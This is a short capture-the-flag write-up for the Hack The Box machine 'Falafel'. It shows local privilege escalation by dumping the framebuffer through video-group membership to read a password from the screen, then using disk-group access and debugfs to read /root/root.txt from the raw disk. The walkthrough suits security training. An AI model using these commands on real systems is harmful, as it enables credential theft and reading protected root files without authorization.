HTB Falafel privilege escalation writeup

User moshe is in video group

$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)

Frame buffer (/dev/fb0) belongs to video group

$ ls -lah /dev/fb0
crw-rw---- 1 root video 29, 0 Jun 24 09:32 /dev/fb0

Dump framebuffer

$ cat /dev/fb0 > .ayamkambing

Transfer the dump to your machine and find a way to convert the raw framebuffer to image.

I use this - fb2png

That tool only take /dev/fb0 as input so I copied the dump to my own framebuffer first

[akmal@akmal ~]$ cat ../.ayamkambing > /dev/fb0
[akmal@akmal ~]$ ./fb2png

You’ll get a screenshot of the current screen and user yossi’s password is shown. Use su to switch to user yossi (or SSH as yossi)

$ su - yossi
Password:
yossi@falafel:~$

Yossi is in disk group

yossi@falafel:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)

Initially I tried to dump the whole /dev/sda1 but greeted with disk full error. Thanks to https://unix.stackexchange.com/questions/90996/ls-on-device-without-mounting-it, I learnt that you can use debugfs to run command on raw disk.

yossi@falafel:~$ /sbin/debugfs -R "cat /root/root.txt" /dev/sda1
debugfs 1.42.13 (17-May-2015)
23b7920*************f2091c001fa1

Yay!